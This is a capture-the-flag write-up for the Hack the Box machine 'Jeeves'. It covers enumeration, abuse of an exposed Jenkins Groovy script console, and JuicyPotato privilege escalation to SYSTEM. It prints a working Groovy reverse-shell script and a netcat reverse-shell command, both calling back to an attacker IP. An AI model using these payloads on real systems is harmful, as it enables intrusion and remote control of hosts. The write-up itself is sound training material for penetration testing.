👨‍💻
Pentesting
HomePlaygroundCTFsBuy Me a Flag 🚩
  • Zeyu's OSCP Writeups
  • Home
  • CTF Writeups
  • Playground
  • Blog Posts
    • My OSCP Journey: How I Tried Harder
  • Proving Grounds
    • Warm Up
      • Pebbles
      • Twiggy
      • Bratarina
      • Internal
      • ClamAV
    • Get to Work
      • Nibbles
      • Nickel
      • WebCal
      • Authby
      • Pelican
      • Jacko
      • Medjed
      • XposedAPI
    • Try Harder
      • Meathead
  • Hack the Box
    • Easy
      • ScriptKiddie
      • Delivery
      • Laboratory
      • Academy
      • Sense
    • Medium
      • Cronos
      • Jeeves
Powered by GitBook
On this page

Was this helpful?

Last updated 3 years ago

Was this helpful?

Service Enumeration

nmapAutomator.sh -H 10.10.10.63 -t all

Port 80

A HTTP service runs on port 80. Entering an input in the search bar results in a server error, showing us some information about the versions of the services and OS it is running.

Port 50000

Another web service, running Jetty, is on port 50000. Using the directory-list-2.3-medium.txt wordlist from dirbuster, we can perform subdirectory enumeration on the target.

gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

This uncovers a /askjeeves directory.

By going to http://10.10.10.63:50000/askjeeves/, we find a Jenkins page.

Exploitation

By going to http://10.10.10.63:50000/askjeeves/script, we can execute scripts on the Groovy script console.

By changing first line in the script, we can execute arbitrary shell commands.

We can change the script to instead trigger a reverse shell.

On our Netcat listener, we obtain a reverse shell.

Privilege Escalation

We can use WinPEAS to enumerate.

After transferring JuicyPotato.exe and Netcat, we can run the following command to get another shell:

JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.23 443" -t *

We have successfully obtained SYSTEM privileges.

We find a hm.txt in place of root.txt.

However, we can find that there is an additional data stream hidden in the file.

Source:

Very quickly, we see that the SeImpersonatePrivilege token is enabled. We can exploit this with JuicyPotato ().

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
String host="10.10.14.23";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
  1. Hack the Box
  2. Medium

Jeeves

PreviousCronos
  • Service Enumeration
  • Port 80
  • Port 50000
  • Exploitation
  • Privilege Escalation
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
https://github.com/ohpe/juicy-potato